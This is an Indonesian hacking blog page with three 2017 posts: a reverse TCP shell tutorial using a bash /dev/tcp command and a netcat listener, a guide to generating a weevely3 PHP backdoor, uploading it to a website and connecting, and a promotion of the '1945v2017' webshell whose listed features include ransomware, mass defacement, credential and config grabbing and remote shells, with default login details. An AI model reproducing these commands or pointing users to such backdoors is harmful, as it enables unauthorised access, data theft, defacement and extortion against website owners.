Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Tuesday, 5 September 2017

Meremote Komputer Linux di Android Menggunakan Reverse TCP Shell



Dalam tutorial kali ini akan membahas mengenai bagaimana cara meremote menggunakan reverse shell. Logikanya seperti berikut komputer dijadikan sebagai server yang akan menghubungi ponsel android, dan ponsel android tersebut yang akan mendengarkan / Listening port yang di gunakan untuk menghubungi ponsel android tersebut.
Metode ini digunakan untuk mempelajari bagaimana cara attacker meremote suatu server tanpa menggunakan SSH.
Sebelum memulai ponsel kita harus terinstall termux.

1. Pertama buka aplikasi termux-nya di ponsel, kemudian kita lihat ip berapa yang dipakai oleh ponsel tersebut.
ifconfig
2. Setelah muncul kemudian ketik perintah.
nc -l -p 8888
3. Selanjutnya masuk terminal komputer lalu ketikkan perintah.
bash -i >& /dev/tcp/IP ANDROID/8888 0>&1
Rincian :
Warna biru adalah IP dari ponsel.
Warna merah adalah port yang dilisten dari aplikasi termux di android tadi.


4. Langkahnya sudah selesai. Sebagai pembuktiannya bisa dibuka lagi aplikasi termux di ponsel tadi. Jika console dari komputer sudah muncul maka remote kita sudah berhasil.
Jika ingin menampilkan rincian bisa pakai perintah "uname -a" dan "lsb_release -a" seperti gambar dbawah ini.


  

Sunday, 27 August 2017

Tutorial BackConnect Menggunakan Weevely3

Weevely adalah salah satu web tools penetrasi test. shell web command line yang dirancang untuk administrasi server jarak jauh dan pengujian penetrasi. Terminal mengeksekusi kode remote sewenang-wenang melalui agen PHP tapak kecil yang berada di server HTTP. Lebih dari 30 modul membentuk administrasi web yang mudah disesuaikan dan backdoor pasca-eksploitasi untuk pemeliharaan akses, eskalasi hak istimewa dan pergerakan lateral jaringan, bahkan di lingkungan yang dibatasi.

Langkah untuk menggunakan tool ini:

1. Pertama perangkat kita harus sudah terinstall tools weevely3nya. Caranya:
git clone git://github.com/epinna/weevely.git
NB: Jika perangkat belum terintal "git" maka "sudo apt-get install git".

2. Setelah itu, install dependensi dari weevely, supaya weevely3 bisa berjalan tanpa error.
sudo apt-get install python-prettytable python-mako python-dateutil python-socks python-yaml python

3. Selanjutnya, masuk ke directory weevely3.
cd weevely3
4. Setelah itu, generate terlebih dahulu backdoor dari weevely3 nya menggunaka perintah. 
python weevely.py generate <password> <backdoor.php>

5. Upload file hasil output weevely tadi yang saya berinama "<bacdoor.php" ke website yang telah di siapkan.

6. Setelah terUpload, selanjutnya ke proses remote weevely nya.
python weevely.py http://website/path/backdor.php <password>

Jika sudah seperti gambar di atas berarti kita sudah berhasil masuk melalui backdoor yang di generate dari weevely. 

Referensi :
http://www.alinko.jp

Wednesday, 23 August 2017

Shell backdoor 1945v2017 by shutdown57 (NEW VERSION)

Seperti apa yang sudah di post oleh abang Alinko di akun Facebooknya. Kini Shell 1945v2017 sudah rilis. Shell ini selesai tanggal 16 Agustus 2017 dan dipublishkan bersamaan dengan hari kemerdekaan indonesia. Sheel ini mempunyai berbagai fitur. Seperti yang dikutip di lamannya, diantaranya:

  1. # Login / Auth #!
    • Default password : "asukabeh" (tanpa tanda kutip) di enskripsi dalam MD5
    • Default username : shutdown57
    • Hidden login     : TRUE or FALSE pada variable "$hidden_login" , jika TRUE halaman login shell tersembunyi
    • Show Hidden login: Pada variable $loguri_1945 = "?login=1945" berarti halaman login ada di shell.php?login=1956

  2. # FILEMANAGER #!
    • Rename
    • Edit
    • Delete
    • Dump Hex
    • Download
    • Newfile
    • New Directory
  3. # MENU BAR #!
    • Home   : FileManager
    • Sec. Info : Security Info tentang server
    • Command : Memasukan perintah menggunakan fungsi, system , shell_exec , passthru , exec , jadi pastikan server memiliki fungsi tersebut
    • Upload : Kelebihannya bisa upload file secara multiple
    • SQL : Koneksi ke Database SQL secara manual menggunakan SQL Command
    • PHP : Menjalankan PHP Code menggunakan fungsi Eval()
    • PS : Mengetahui Proccess Status
    • String Tools : String tools berisi encode decode hash
    • Remote Shell : Bind Port , BackConnect
    • Mail : Mengirim email menggunakan fungsi mail() di php
    • Ransomeware   : Hati hati menggunakan tools ini.
    • Kuchiyose : Memanggil script / webshell dari luar
    • List tools   : Daftar  tools tentang server dan webshell
           - Get Config   : mendapatkan config dari website
           - Grab cPanel : mendapatkan cpanel       - Jumping       : mengetahui web yang berada dalam satu server
           - Symlink       : Symbolic link
           - *.jpg shell (.htacess) : membuat shell berekstensi .jpg menggunakan htaccess
           - Stamped site : Deface website dengan script deface dari 1945Shell
           - SMTP Grabber : mendapatkan SMTP Jika ada config Smtp
           - RDP Tools : Membuat,mengubah,menghapus Remote Desktop akun untuk windows server
           - Admin Finder : menemukan admin berdasarkan wordlist
           - Fake root
           - Mass Deface
           - Zone-H
    • CGI Shell    : CGI Menggunakan bahasa pemrograman Bash Shell Scripting
    • CGI Perl   : CGI Menggunakan bahasa pemrograman Perl 
    • About   : tentang webshell ini
     
Ada dua versi dari shell ini. Yang pertama adalah versi full, yang kedua versi web mini.

(Versi full)

Github | Pastebin
(Versi Mini Webshell)
Github | Pastebin


Regard : shutdown57 < alinko >